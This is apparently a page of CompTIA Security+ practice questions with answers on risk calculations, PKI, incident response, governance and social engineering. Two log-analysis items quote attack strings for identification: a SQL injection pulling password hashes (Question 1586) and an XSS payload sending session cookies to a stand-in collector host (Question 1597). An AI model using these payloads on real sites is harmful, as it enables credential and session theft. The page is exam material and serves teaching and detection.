All practice questions

2232 questions

Question 1581Question

An organization is preparing to decommission a legacy Lightweight Directory Access Protocol (LDAP) directory server following a enterprise-wide migration to a cloud identity provider. To ensure business continuity and prevent unexpected service disruptions during the shutdown, which of the following actions should the security team perform FIRST to evaluate the security impact of this change?

Show answer & explanation

Answer: Perform a dependency analysis and review directory authentication logs to identify any remaining applications or devices reliant on the legacy service.

Answer

Perform a dependency analysis and review directory authentication logs to identify any remaining applications or devices reliant on the legacy service.
Prior to decommissioning core security or identity infrastructure, change management best practices require conducting a thorough dependency analysis and reviewing system logs. This proactive assessment identifies legacy applications, service accounts, or hardware devices still utilizing the service, allowing administrators to migrate them safely without causing unexpected outages.

Step-by-Step Solution

1
Identify the primary operational and security risk associated with decommissioning critical identity infrastructure.
Undocumented service dependencies could cause critical application outages or fallbacks to insecure authentication methods.
Decommissioning systems requires discovering all integrated components before removing service availability.
2
Evaluate the initial step of a change management security impact assessment.
Reviewing active authentication logs and service configuration references provides empirical evidence of usage.
Empirical log analysis reveals real-time usage patterns that static documentation may omit.
3
Determine the proper sequence prior to change approval and execution.
Performing dependency mapping ensures comprehensive risk mitigation before submitting final change approval requests.
Proactive dependency discovery ensures controlled, risk-aware infrastructure modification.

Key Concept

Dependency mapping and risk analysis in change management workflows
Question 1582Question

A security administrator is configuring a secure transmission channel for automated database synchronization between two enterprise data centers. The organization requires a cryptographic configuration that guarantees mutual identity authentication of both endpoint servers, session confidentiality with perfect forward secrecy (PFS), and payload integrity. Which of the following cryptographic mechanisms or protocols should the administrator select? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Configure Elliptic Curve Diffie-Hellman Ephemeral (ECDHE) key exchange during TLS session negotiation; Enforce Mutual TLS (mTLS) with dual-sided X.509 digital certificate validation

Answer

The correct cryptographic mechanisms to implement are Elliptic Curve Diffie-Hellman Ephemeral (ECDHE) key exchange for perfect forward secrecy and Mutual TLS (mTLS) with X.509 certificates for mutual authentication.
Implementing Elliptic Curve Diffie-Hellman Ephemeral (ECDHE) key exchange provides dynamic, single-session keys that guarantee perfect forward secrecy. Pairing ECDHE with Mutual TLS (mTLS) ensures both database servers authenticate each other's identity using digital certificates prior to payload transmission.

Step-by-Step Solution

1
Evaluate the requirement for session confidentiality with perfect forward secrecy (PFS).
Elliptic Curve Diffie-Hellman Ephemeral (ECDHE) generates temporary, single-session key pairs for each connection, ensuring past traffic remains secure even if long-term private keys are exposed.
Ephemeral Diffie-Hellman variants are necessary to fulfill PFS constraints.
2
Evaluate the requirement for mutual authentication between enterprise data center nodes.
Mutual TLS (mTLS) requires both the initiating server and receiving server to present X.509 certificates issued by a trusted Certificate Authority.
Standard TLS only authenticates the server to the client, whereas mTLS enforces bidirectional certificate verification.
3
Analyze and eliminate unsuitable cryptographic choices.
Static RSA key exchange lacks PFS, RSA asymmetric encryption is unsuitable for bulk data transfers due to performance overhead, and MD5 is cryptographically broken.
Cryptographic implementations must align cipher capabilities with specific operational performance and risk requirements.

Key Concept

Key Exchange Mechanisms and Authentication Protocols
Estimated Time:1m 30s
Question 1583Question

Following a high-severity alert indicating a web shell has been uploaded to a public-facing corporate web server, an incident response team is deployed to handle the breach. Place the following incident response actions in the correct sequential order from earliest to latest according to the standard NIST Incident Response Lifecycle.

Drag items to arrange them in the correct order

Show answer & explanation

Answer

The correct sequence follows the standard NIST Incident Response Lifecycle: 1. Analyze web server access logs and system memory, 2. Isolate the compromised web server from the internal network, 3. Remove the web shell backdoors and patch the vulnerability, 4. Restore the web application from a clean backup image and return it to production, 5. Conduct a post-incident meeting to document findings and update WAF rules.
The standard NIST incident response methodology strictly mandates moving through Detection & Analysis, Containment, Eradication, Recovery, and Post-Incident Activity. First analyzing system memory and logs allows responders to understand the threat. Network isolation contains the incident from spreading. Eradicating the web shell and patching the vulnerability removes the threat. Restoring from a verified clean backup completes recovery. Finally, conducting a post-mortem review fulfills post-incident obligations.

Step-by-Step Solution

1
Scope and analyze the threat (Detection & Analysis)
Identified the web shell location and scope of access.
You must first analyze and understand the extent of an active breach before taking disruptive containment steps.
2
Isolate the affected system (Containment)
Prevented lateral movement across the internal enterprise network.
Containment limits operational damage while preserving volatile data for further analysis.
3
Eliminate the threat and vulnerability (Eradication)
Removed malicious web shell files and remediated the root application flaw.
Eradication ensures the attacker cannot maintain persistence once the system is re-exposed.
4
Restore system operations (Recovery)
Web server restored from clean state and validated in production.
Recovery tests and restores operational services safely.
5
Conduct post-incident activities (Post-Incident / Lessons Learned)
Playbooks updated and Web Application Firewall rules hardened.
Lessons learned feed back into the preparation phase to prevent future occurrences.

Key Concept

NIST Incident Response Lifecycle (Detection & Analysis → Containment → Eradication → Recovery → Post-Incident Activity)
Question 1584Question

A customer service representative receives an incoming telephone call from an individual claiming to be an internal network administrator. The caller states that an urgent system maintenance procedure requires the representative to verbally confirm their network login credentials. Which of the following social engineering attack vectors is occurring?

Show answer & explanation

Answer: Vishing

Answer

Vishing
Vishing (voice phishing) specifically describes social engineering attacks conducted via telephone calls or voice communications where the attacker impersonates a trusted entity to extract sensitive information.

Step-by-Step Solution

1
Analyze the communication medium in the scenario
The attack is carried out over an incoming telephone phone call.
Identifying the medium (voice vs text vs email vs physical observation) is key to classifying the attack vector.
2
Evaluate the social engineering vector based on voice communication
Voice-based pretexting and fraud conducted over the telephone is defined as voice phishing (vishing).
The prefix 'vish' stands for voice phishing, matching phone call scenarios.

Key Concept

Vishing (Voice Phishing)
Estimated Time:45s
Question 1585Question

A financial organization is conducting a quantitative risk assessment for a mission-critical cloud payment API valued at $1,200,000\$1,200,000. Security analysts estimate that without additional controls, a major security breach would have an Exposure Factor (EFEF) of 40%40\% and an Annual Rate of Occurrence (AROARO) of 0.500.50. The organization evaluates a security safeguard with an annual operating cost of $45,000\$45,000. Implementing the safeguard is projected to reduce the EFEF to 10%10\% and the AROARO to 0.250.25. Based on this quantitative risk analysis, what is the net annual financial benefit of implementing the safeguard?

Show answer & explanation

Answer: Net annual benefit of $165,000\$165,000

Answer

The net annual financial benefit of implementing the safeguard is $165,000\$165,000.
The correct option determines the net annual benefit by evaluating the difference between baseline annual risk and residual annual risk after control implementation, then subtracting the safeguard's annual maintenance cost. Pre-mitigation ALE is $240,000\$240,000 ($1,200,000×0.40×0.50\$1,200,000 \times 0.40 \times 0.50) and post-mitigation ALE is $30,000\$30,000 ($1,200,000×0.10×0.25\$1,200,000 \times 0.10 \times 0.25). The gross annual savings from risk reduction is $210,000\$210,000 ($240,000$30,000\$240,000 - \$30,000). Subtracting the safeguard's $45,000\$45,000 annual operational cost yields a net annual financial benefit of $165,000\$165,000.

Step-by-Step Solution

1
Calculate the pre-initiative Single Loss Expectancy (SLE) and Annual Loss Expectancy (ALE)
SLEinitial=$1,200,000×0.40=$480,000SLE_{initial} = \$1,200,000 \times 0.40 = \$480,000; ALEinitial=$480,000×0.50=$240,000ALE_{initial} = \$480,000 \times 0.50 = \$240,000
Determines the current expected baseline annual loss prior to implementing additional controls.
2
Calculate the post-initiative SLE and ALE with the safeguard in place
SLEpost=$1,200,000×0.10=$120,000SLE_{post} = \$1,200,000 \times 0.10 = \$120,000; ALEpost=$120,000×0.25=$30,000ALE_{post} = \$120,000 \times 0.25 = \$30,000
Determines the residual annual loss expected after applying the proposed safeguard.
3
Calculate the gross ALE reduction (value of risk mitigation)
ALE Reduction=$240,000$30,000=$210,000\text{ALE Reduction} = \$240,000 - \$30,000 = \$210,000
Measures the annual loss prevented by reducing exposure and frequency of occurrence.
4
Subtract the annual cost of the safeguard to determine net benefit
Net Benefit=$210,000$45,000=$165,000\text{Net Benefit} = \$210,000 - \$45,000 = \$165,000
A safeguard is cost-effective if the net annual benefit (annual loss saved minus annual cost) is positive.

Key Concept

Quantitative Risk Analysis & Safeguard Cost-Benefit Calculation
Estimated Time:2m 0s
Question 1586Question

A security analyst monitoring enterprise SIEM alerts identifies an anomalous HTTP payload captured by an inline Network Intrusion Detection System (NIDS) sensor placed in front of an internal application gateway:

POST /api/v2/products/search HTTP/1.1
Host: portal.internal.corp
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

item_id=55+UNION+SELECT+null,username,password_hash+FROM+users--

Which of the following correctly identifies the root cause of this alert and the appropriate technical mitigation?

Show answer & explanation

Answer: The alert indicates a SQL injection attack targeting the backend database; the vulnerability should be mitigated using parameterized queries or web application firewall filtering.

Answer

The alert indicates a SQL injection attack targeting the backend database; the vulnerability should be mitigated using parameterized queries or web application firewall filtering.
The captured NIDS payload shows an attacker passing SQL commands (`UNION SELECT null,username,password_hash FROM users--`) inside the `item_id` request parameter. This pattern explicitly targets backend database management systems via SQL Injection. Proper remediation requires enforcing parameterized queries (prepared statements) in application code and deploying Web Application Firewall (WAF) inspection rules.

Step-by-Step Solution

1
Analyze the log payload in the NIDS alert stem.
Identified the SQL syntax `UNION SELECT null,username,password_hash FROM users--` injected into the `item_id` parameter.
Recognizing SQL statements within user input parameters isolates the attack vector to application-layer database manipulation.
2
Differentiate between web application attack types.
Confirmed the attack is SQL Injection (SQLi) rather than Cross-Site Scripting (XSS) or a network-layer memory buffer overflow.
SQLi attempts to read or modify database content, while XSS executes client-side scripts in the victim browser.
3
Determine the effective security control for mitigation.
Selected parameterized queries (prepared statements) at the application code level and Web Application Firewall (WAF) filtering at the network monitoring level.
Parameterized queries separate SQL code from user data, preventing unauthorized payload execution, while WAFs inspect layer-7 application traffic.

Key Concept

Network Intrusion Detection Log Analysis and SQL Injection Mitigation
Estimated Time:1m 30s
Question 1587Question

An organization manages a fleet of remote workstations that frequently drift from the established secure configuration baseline due to localized user modifications made while devices are offline. The security team requires a technical control that continuously audits system settings and automatically restores non-compliant configurations back to the approved baseline whenever devices re-establish network connectivity. Which of the following mechanisms best fulfills this requirement?

Show answer & explanation

Answer: Automated configuration management agents enforcing desired-state policies

Answer

Automated configuration management agents enforcing desired-state policies
Automated configuration management software utilizing desired-state enforcement continuously monitors endpoint operating systems and applications against established secure baseline templates. When a system drifts from its designated baseline standard due to local user edits or unapproved software changes, the agent automatically reapplies the baseline settings as soon as policy synchronization occurs.

Step-by-Step Solution

1
Analyze the operational requirements
The requirement calls for a system that actively detects configuration drift on remote endpoints and automatically reverts settings to match the baseline upon reconnecting.
Offline systems modified locally require persistent agent-driven policy enforcement that triggers remediation when connectivity allows.
2
Evaluate configuration management control capabilities
Automated configuration management frameworks (such as Desired State Configuration or policy enforcement agents) continuously verify endpoint settings against defined baseline standards and auto-apply corrective changes.
Desired-state configuration models directly address unauthorized baseline drift through automated restoration.

Key Concept

Configuration Baseline Enforcement and Drift Remediation
Estimated Time:1m 30s
Question 1588Question

An enterprise security operations team is enhancing the security posture of an automated CI/CD deployment pipeline for containerized microservices. To prevent configuration drift from the established hardening baseline and guarantee timely vulnerability remediation across deployed container hosts, which of the following operational practices should be implemented? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Rebuild and redeploy container base images whenever security patches are published for underlying OS dependencies; Integrate automated configuration baseline scanning into the build pipeline to reject non-compliant image definitions

Answer

Rebuilding and redeploying container base images when OS patches are released, along with integrating automated baseline compliance scanning into the deployment pipeline, ensures effective patch and configuration management.
In modern containerized deployments, patch management relies on updating the underlying base image and redeploying containers (immutable infrastructure) rather than patching live instances. Simultaneously, automated baseline scanning during the pipeline execution ensures that configuration standards are verified before deployment, effectively preventing configuration drift.

Step-by-Step Solution

1
Analyze container patch management requirements in modern CI/CD pipelines
Recognize that containerized applications utilize immutable deployment patterns, requiring base image updates rather than in-place server patching
Direct patching of running containers leads to configuration drift and inconsistent environments across microservices
2
Evaluate configuration drift prevention mechanisms
Identify automated image configuration scanning as the preventive mechanism to enforce hardening baselines prior to deployment
Automated pipeline checks prevent non-compliant or drift-susceptible container definitions from reaching production environments

Key Concept

Immutable Container Patching and Pipeline Configuration Auditing
Question 1589Question

An enterprise security team is upgrading its internal 802.1X EAP-TLS network authentication infrastructure. During validation testing, corporate endpoints fail to establish a TLS tunnel with the RADIUS server, returning certificate trust and capability errors. Further inspection confirms that the root and subordinate Intermediate CA certificates are properly installed in the endpoint trust stores. Which of the following certificate misconfigurations would cause endpoints to reject the RADIUS server certificate? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: The certificate lacks an Extended Key Usage (EKU) extension explicitly defining Server Authentication.; The certificate omits the Subject Alternative Name (SAN) extension, relying solely on the Subject Common Name (CN) field.

Answer

The authentication failures are caused by omitting the Extended Key Usage (EKU) extension specifying Server Authentication and omitting the Subject Alternative Name (SAN) extension required for modern hostname and identity validation.
For an 802.1X EAP-TLS authentication server certificate to be validated successfully by endpoints, it must contain specific X.509 v3 extensions. First, the Extended Key Usage (EKU) field must explicitly specify Server Authentication so client supplicants verify the certificate's intended operational role. Second, modern clients strictly enforce RFC 6125 standards and require the Subject Alternative Name (SAN) extension to match server identity attributes. Omitting either extension leads to validation failure despite having trusted root and intermediate certificates.

Step-by-Step Solution

1
Analyze X.509 v3 extension constraints required for 802.1X EAP-TLS server certificates.
Identified that Extended Key Usage (EKU) must explicitly state Server Authentication (OID 1.3.6.1.5.5.7.3.1) so supplicants accept the server's intended role.
Without the Server Authentication EKU attribute, supplicant validation engines treat the certificate as invalid for establishing TLS server connections.
2
Evaluate domain identity matching rules implemented in modern operating system supplicants.
Identified that modern validation enforcement requires the Subject Alternative Name (SAN) extension.
RFC 6125 deprecates using only the Subject Common Name (CN) for name validation, causing endpoints to reject server certificates that do not include the SAN extension.

Key Concept

X.509 v3 Extension Attributes and Endpoint Validation Rules
Question 1590Question

An enterprise security governance team is restructuring organizational documentation to ensure clear operational authority and compliance across all business units. Match each security governance document type on the left with its correct legal and operational description on the right.

Click a left item, then click its matching right item

Items

Acceptable Use Policy (AUP)
Data Classification Standard
Server Security Baseline
Remote Work Security Guideline

Matches

Show answer & explanation

Answer

Acceptable Use Policy matches the high-level mandatory directive; Data Classification Standard matches the mandatory schema for categorizing assets; Server Security Baseline matches the mandatory minimum configuration threshold; Remote Work Security Guideline matches the discretionary best practices recommendations.
In security governance hierarchies, Policies (such as an Acceptable Use Policy) represent senior management's mandatory high-level directives. Standards (such as a Data Classification Standard) provide mandatory, specific rules and schemas supporting policy execution. Baselines (such as a Server Security Baseline) define the minimum required operational configurations needed to establish a consistent security floor. Guidelines (such as Remote Work Security Guidelines) offer discretionary, non-mandatory advice and best practices for operational flexibility.

Step-by-Step Solution

1
Analyze document authority levels
Identify high-level mandatory directives vs specific mandatory technical specifications vs baseline thresholds vs discretionary advice.
Governance frameworks depend on distinguishing mandatory policy/standard/baseline elements from advisory guidance.
2
Map policies and standards to their definitions
Link the Acceptable Use Policy to overall behavioral directives and Data Classification Standard to compulsory labeling schemas.
Policies set top-level rules while standards define compulsory technical requirements.
3
Map baselines and guidelines to operational implementations
Link Server Security Baseline to minimum system configuration settings and Remote Work Security Guideline to discretionary advisory practices.
Baselines establish mandatory minimum security floors, whereas guidelines provide non-binding recommendations.

Key Concept

Information Security Policy and Governance Hierarchy Document Types
Question 1591Question

An organization is evaluating its risk management procedures to align with standard risk response strategies. Which of the following actions correctly represent valid risk response strategies? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Purchasing a commercial cyber insurance policy to cover financial losses resulting from data breaches.; Decommissioning a vulnerable legacy service entirely to eliminate the risk of remote exploitation.

Answer

The actions representing valid risk response strategies are purchasing a cyber insurance policy (risk transference) and decommissioning a vulnerable legacy service (risk avoidance).
Purchasing cyber insurance shifts the financial burden of an attack to an insurance provider, which is the definition of risk transference. Decommissioning a vulnerable legacy application removes the threat vector completely, which is the definition of risk avoidance.

Step-by-Step Solution

1
Identify the standard risk response options
The core risk response options are Risk Acceptance, Risk Avoidance, Risk Mitigation (Reduction), and Risk Transference.
Risk management frameworks categorize response activities into distinct strategies based on how the risk is handled.
2
Evaluate the statement regarding cyber insurance
Purchasing cybersecurity insurance shifts financial loss impacts to an insurer.
Shifting impact or loss liability to a third party is defined as Risk Transference.
3
Evaluate the statement regarding service decommissioning
Discontinuing a legacy service removes the risk entirely.
Altering plans or stopping activities to remove threat vectors entirely is defined as Risk Avoidance.

Key Concept

Risk Response Strategies (Avoidance, Transference, Mitigation, Acceptance)
Question 1592Question

An enterprise financial institution processes real-time transaction records that are committed to a primary relational database every 15 minutes. Following a catastrophic database corruption incident at 14:00, the organization restores system functionality by 17:00 using a clean backup snapshot created at 13:00. During the subsequent Business Impact Analysis (BIA) audit, the board notes that while the system was successfully restored within the acceptable 4-hour operational window before regulatory penalties apply, the financial loss from unrecoverable transactions exceeded the acceptable threshold of 30 minutes of data loss. Which parameter must the Chief Information Security Officer (CISO) modify in the Business Continuity Plan (BCP) to directly address this compliance failure?

Show answer & explanation

Answer: Decrease the Recovery Point Objective (RPO) requirement and adjust automated database snapshot schedules accordingly.

Answer

The organization must decrease the Recovery Point Objective (RPO) requirement and adjust automated snapshot frequencies to limit transaction data loss.
The correct answer correctly identifies Recovery Point Objective (RPO) as the metric governing maximum acceptable data loss measured in time. Because 1 hour of transaction data was lost while the allowable threshold was 30 minutes, lowering the RPO requirement and increasing snapshot frequency is the required corrective action.

Step-by-Step Solution

1
Analyze the incident metrics described in the scenario.
System downtime lasted 3 hours (14:00 to 17:00), which met the 4-hour recovery time constraint. Data loss spanned 1 hour (13:00 snapshot to 14:00 crash), exceeding the 30-minute allowable threshold.
Differentiating between time to restore operational state and maximum acceptable data loss is essential for proper metric identification.
2
Map the unmet constraint (data loss duration) to the appropriate BIA continuity metric.
The target metric measuring allowable data loss in time is Recovery Point Objective (RPO).
RPO dictates backup frequency and data replication requirements to ensure unrecoverable transactional data remains within tolerance.
3
Determine the necessary operational change.
Lowering the RPO threshold to 30 minutes or less forces snapshot schedules to run more frequently, rectifying the audit compliance finding.
Aligning technical backup windows with the revised lower RPO ensures lost data falls within acceptable financial risk boundaries.

Key Concept

Distinction between Recovery Point Objective (RPO) and Recovery Time Objective (RTO) in Business Impact Analysis
Question 1593Question

An enterprise risk analyst is conducting a quantitative risk assessment for a Payment Card Industry (PCI) transaction processing gateway. The asset value (AVAV) of the server cluster is $600,000\$600,000. Threat intelligence estimates an Annualized Rate of Occurrence (AROARO) of 0.400.40 for a severe security breach, with an unmitigated Exposure Factor (EFEF) of 30%30\%.

To mitigate this risk, the organization deploys a continuous security monitoring and automated data protection control costing $15,000\$15,000 annually. This control reduces the Exposure Factor (EFEF) to 5%5\% while the AROARO remains unchanged.

What is the net annual financial benefit (in USD) of implementing this security control?

Show answer & explanation

Answer: 45000

Answer

The net annual financial benefit of implementing the security control is $45,000 USD.
The initial Annualized Loss Expectancy (ALEinitialALE_{initial}) is calculated as AV×EF×ARO=$600,000×0.30×0.40=$72,000AV \times EF \times ARO = \$600,000 \times 0.30 \times 0.40 = \$72,000. After implementing the control, the new ALEALE is $600,000×0.05×0.40=$12,000\$600,000 \times 0.05 \times 0.40 = \$12,000. The risk mitigation yields a gross annual reduction in loss of $60,000\$60,000. Subtracting the safeguard's annual cost of $15,000\$15,000 yields a net annual financial benefit of $45,000\$45,000.

Step-by-Step Solution

1
Calculate initial Annualized Loss Expectancy (ALE)
ALEinitial=$600,000×0.30×0.40=$72,000ALE_{initial} = \$600,000 \times 0.30 \times 0.40 = \$72,000
Determines total expected financial loss per year before implementing the safeguard.
2
Calculate post-control Annualized Loss Expectancy (ALE)
ALEmitigated=$600,000×0.05×0.40=$12,000ALE_{mitigated} = \$600,000 \times 0.05 \times 0.40 = \$12,000
Determines expected financial loss per year after the safeguard reduces exposure.
3
Compute net annual financial benefit
Net Benefit=($72,000$12,000)$15,000=$45,000Net\ Benefit = (\$72,000 - \$12,000) - \$15,000 = \$45,000
Subtracts the annual cost of the safeguard from the gross annual loss reduction to find net savings.

Key Concept

Quantitative Risk Analysis & Cost-Benefit Calculation (ALE and Safeguard ROI)
Question 1594Question

A security analyst receives a high-priority alert indicating suspicious data transfers originating from an internal workstation. Arrange the network security monitoring and response actions in the correct sequential order from initial alert detection to detection rule optimization.

Drag items to arrange them in the correct order

Show answer & explanation

Answer

The correct sequential order begins with triaging the initial NIDS alert, followed by cross-referencing NetFlow and firewall logs, performing deep packet inspection on PCAPs, applying NAC network isolation policies, and finally updating SIEM correlation rules and NIDS signatures.
Effective network security monitoring follows a structured incident response sequence. Response starts at initial alert triage, proceeds through flow correlation to verify connection validity, conducts deep packet inspection for payload analysis, executes containment via Network Access Control to halt threat propagation, and finishes by refining detection rules in the SIEM and NIDS.

Step-by-Step Solution

1
Alert Triage
Identified suspicious alert metadata from the perimeter NIDS sensor.
The analyst must first examine the initial trigger to understand the target host and alert classification.
2
Telemetry Correlation
Confirmed active session duration and transfer volume via NetFlow and firewall log entries.
Before performing resource-intensive analysis, flow telemetry must confirm that actual traffic traversed the network.
3
Packet Payload Inspection
Extracted malicious command-and-control artifacts and payload signatures from PCAP data.
Inspecting raw frame contents provides concrete evidence of compromise needed to justify containment.
4
Host Containment
Isolated the originating workstation from the broader enterprise network using NAC.
Containing the network segment stops data exfiltration and lateral movement while preserving evidence.
5
Rule Optimization and Feedback
Tuned SIEM correlation rules and updated intrusion signatures with newly identified IoCs.
Post-incident detection rule adjustments improve future monitoring speed and reduce false positives.

Key Concept

Network Security Monitoring Incident Handling Workflow
Question 1595Question

Match each social engineering attack vector on the left with its corresponding operational incident scenario description on the right.

Click a left item, then click its matching right item

Items

Tailgating
Watering Hole Attack
Smishing
Shoulder Surfing

Matches

Show answer & explanation

Answer

Tailgating matches unbadged physical entry by following authorized personnel; Watering Hole Attack matches compromising a trusted, frequently visited website; Smishing matches deceptive SMS text messages containing malicious links; Shoulder Surfing matches direct visual observation of screens or keyboard inputs.
Each attack vector correctly maps to its distinct channel and method of execution: tailgating exploits physical access doors, watering hole attacks compromise frequented web destinations, smishing relies on mobile SMS delivery, and shoulder surfing uses line-of-sight observation.

Step-by-Step Solution

1
Analyze the physical access vector
Identify that gaining entry behind an authorized person without badge authorization defines Tailgating.
Tailgating relies on physical proximity and courtesy or distraction at access control points.
2
Analyze the web-based targeted vector
Identify that infecting a specific third-party portal routinely visited by personnel defines a Watering Hole Attack.
Watering hole attacks leverage the implicit trust users place in industry-specific sites.
3
Analyze the mobile cellular and visual observation vectors
Identify cellular text message phishing as Smishing, and covert visual monitoring of user screens as Shoulder Surfing.
Smishing is specific to SMS communication protocols, while shoulder surfing leverages direct line of sight in physical spaces.

Key Concept

Social Engineering Attack Vectors and Methods
Question 1596Question

A security administrator is setting up an automated deployment server that requires an enterprise-issued code-signing certificate from an internal Certificate Authority (CA). Which of the following procedures correctly follows Public Key Infrastructure (PKI) standards for generating and submitting a Certificate Signing Request (CSR)?

Show answer & explanation

Answer: Generate the public and private key pair locally on the deployment server, protect the private key on that server, and transmit only the CSR containing the public key to the CA for signing.

Answer

Generate the public and private key pair locally on the deployment server, protect the private key on that server, and transmit only the CSR containing the public key to the CA for signing.
In standard PKI workflows, the applicant system generates its own public/private key pair locally. The private key is securely retained, and only the public key along with identification data is packaged into the Certificate Signing Request (CSR) sent to the Certificate Authority. This prevents private key exposure during transmission.

Step-by-Step Solution

1
Analyze standard PKI key pair generation location
The target system (deployment server) generates the asymmetric key pair locally so the private key never leaves the boundary of the requesting system.
Preventing private key transit across network interfaces minimizes key exposure and compromise risk.
2
Evaluate the contents and submission of the Certificate Signing Request (CSR)
The CSR package includes the subject identity details and the generated public key, digitally signed by the generated private key to prove key ownership.
The CA requires only the public key and identity validation to issue a signed X.509 digital certificate.
3
Select the choice matching correct CSR generation workflow
The option specifying local key generation and transmitting only the CSR with the public key to the CA is identified as the correct procedure.
This maintains appropriate security boundaries and adheres to standard PKI lifecycle rules.

Key Concept

Public Key Infrastructure (PKI) Certificate Signing Request (CSR) Lifecycle Workflow
Question 1597Question

A network security analyst reviews a SIEM alert containing the following NIDS log entry captured from an internal network monitoring sensor:

[2026-07-27 11:42:19 UTC] NIDS_ALERT
Sensor: NIDS-VPC-EAST-01
Protocol: HTTP/1.1
Src_IP: 10.10.4.88:51204
Dst_IP: 172.16.50.12:80
Request: GET /portal/search.php?q=<script>document.location='http://192.168.1.50/collector.php?cookie='+document.cookie;</script> HTTP/1.1
Action: Flagged (Alert Only)

Which of the following best describes the type of attack captured in this log snippet and its intended objective?

Show answer & explanation

Answer: The alert indicates a Cross-Site Scripting (XSS) attack attempting to execute malicious script code in the victim's browser to exfiltrate session cookies.

Answer

The alert indicates a Cross-Site Scripting (XSS) attack attempting to execute malicious script code in the victim's browser to exfiltrate session cookies.
The correct answer identifies the HTTP parameter containing `<script>` tags as a Cross-Site Scripting (XSS) attempt. The payload attempts to read the victim browser's `document.cookie` object and transmit it to an external IP address, which is a classic indicator of an XSS session hijacking attack.

Step-by-Step Solution

1
Analyze the HTTP GET request string in the NIDS alert log snippet
Identified the payload `<script>document.location='http://192.168.1.50/collector.php?cookie='+document.cookie;</script>` passed into parameter `q`.
Determining the payload syntax reveals the vulnerability targeted by the attacker.
2
Differentiate between client-side and server-side application payload behaviors
The presence of JavaScript commands referencing browser DOM elements (`document.cookie`, `document.location`) confirms client-side execution (XSS) rather than database manipulation (SQLi).
XSS exploits trust that a user's browser has in a web application to steal sensitive tokens or session state.
3
Evaluate the analyst's interpretation against standard security monitoring principles
Confirm that the log captures an unmitigated XSS attempt flagged by a detective NIDS sensor.
Accurate alert classification allows analysts to trigger appropriate incident response playbooks, such as enforcing Web Application Firewall (WAF) rules or input sanitization.

Key Concept

Identifying Cross-Site Scripting (XSS) payloads in NIDS/SIEM log telemetry
Estimated Time:1m 30s
Question 1598Question

During an internal vulnerability assessment, an unauthenticated network scanner flags several Linux production web servers as high-risk due to an outdated Apache version disclosed in the HTTP response headers. The Linux system administrators state that security patches were backported by the distribution vendor, meaning the vulnerabilities were remediated despite the version string remaining unchanged. Which of the following actions is the most appropriate next step for the security analyst to accurately verify the true vulnerability status of these servers?

Show answer & explanation

Answer: Perform a credentialed vulnerability scan to inspect local package management metadata directly on the target hosts.

Answer

Perform a credentialed vulnerability scan to inspect local package management metadata directly on the target hosts.
Performing a credentialed scan allows the vulnerability scanner to authenticate to the Linux host and query the local package manager (e.g., rpm or dpkg). This directly inspects the installed package patch history and confirms backported security fixes that unauthenticated network banner scans cannot detect, accurately resolving false positives.

Step-by-Step Solution

1
Analyze the cause of the potential false positive.
Unauthenticated (non-credentialed) scans rely on network banner grabbing, which reads software version strings exposed over the network. Linux vendors frequently backport security fixes without incrementing major version numbers, causing banner grabs to report false positives.
Understanding scanner limitations prevents unnecessary emergency patching or operational disruptions.
2
Select an assessment method capable of inspecting internal host package states.
A credentialed vulnerability scan logs into the target system using provided administrative credentials to check installed software package versions via the host operating system's package manager.
Host-level inspection provides precise diagnostic data that overrides external network banner assumptions.
3
Verify the true vulnerability status.
The credentialed scan confirms that the vendor backport patch is active, validating the false positive status of the initial unauthenticated scan.
This allows the security team to document the finding correctly without applying unnecessary network blocks.

Key Concept

Credentialed vs. Non-Credentialed Vulnerability Scanning (Backported Patches)
Estimated Time:1m 30s
Question 1599Question

A healthcare organization's high-level security policy mandates that all electronic protected health information (ePHI) must be encrypted both in transit and at rest. However, a internal audit reveals that different operational teams are deploying inconsistent encryption parameters, with some using outdated ciphers. To enforce compliance, security leadership must issue a document that mandates uniform technical rules and mandatory configurations—such as requiring minimum AES-256 for storage and TLS 1.3 for transmission—across all systems, without listing step-by-step administrative workflow actions. Which of the following governance document types should be published to meet this requirement?

Show answer & explanation

Answer: Security standard

Answer

Security standard
A security standard provides mandatory, compulsory rules and technical specifications (such as explicit algorithm requirements like AES-256 or TLS 1.3) designed to support and enforce high-level security policies across an enterprise.

Step-by-Step Solution

1
Analyze the scenario requirement
The organization requires a mandatory document specifying technical configurations (AES-256, TLS 1.3) across all systems without step-by-step task steps.
Identifying the required level of enforceability and technical specificity points to the correct document tier.
2
Evaluate governance document definitions
Policies state high-level intent, standards define mandatory technical criteria, guidelines offer discretionary suggestions, and procedures give step-by-step instructions.
Enforcing compulsory cipher parameters enterprise-wide directly aligns with the definition of a security standard.
3
Select the governance document type
The security standard fulfills the requirement for mandatory, technology-specific compliance rules.
Standards bridge high-level policy intent with enforced baseline implementations.

Key Concept

Hierarchy of Security Governance Documents
Question 1600Question

A DevOps security engineer configures a CI/CD build pipeline to publish container images to a private registry. The registry uses mutual TLS (mTLS) to verify the build agent's identity and evaluates microservice access control lists (ACLs) to ensure the agent holds write permissions. However, an internal audit reveals that detailed logs of image tag modifications and timestamped service upload events are not being recorded or stored centrally. Which pillar of the AAA security framework is absent in this implementation?

Show answer & explanation

Answer: Accounting

Answer

Accounting is the pillar of the AAA security framework missing from this deployment.
Accounting is responsible for tracking user and service activities, recording event metrics, and maintaining centralized audit trails. The failure to record image uploads and timestamped modifications directly indicates that Accounting is missing.

Step-by-Step Solution

1
Analyze the active security components described in the scenario.
Mutual TLS (mTLS) validates system identity (Authentication) and ACLs restrict write actions (Authorization).
Identifying existing controls determines which components of AAA are already present.
2
Determine the unaddressed operational requirement.
The system fails to log timestamped upload events and configuration modifications centrally.
Identifying the gap isolates the unfulfilled security function.
3
Map the missing capability to AAA framework pillars.
Logging, monitoring, and audit logging correspond to Accounting.
Accounting specifically covers tracking activity and maintaining audit trails.

Key Concept

Authentication, Authorization, and Accounting (AAA)
Estimated Time:1m 15s
PreviousPage 80 / 112Next
All practice questions — CompTIA Security+ | Examkin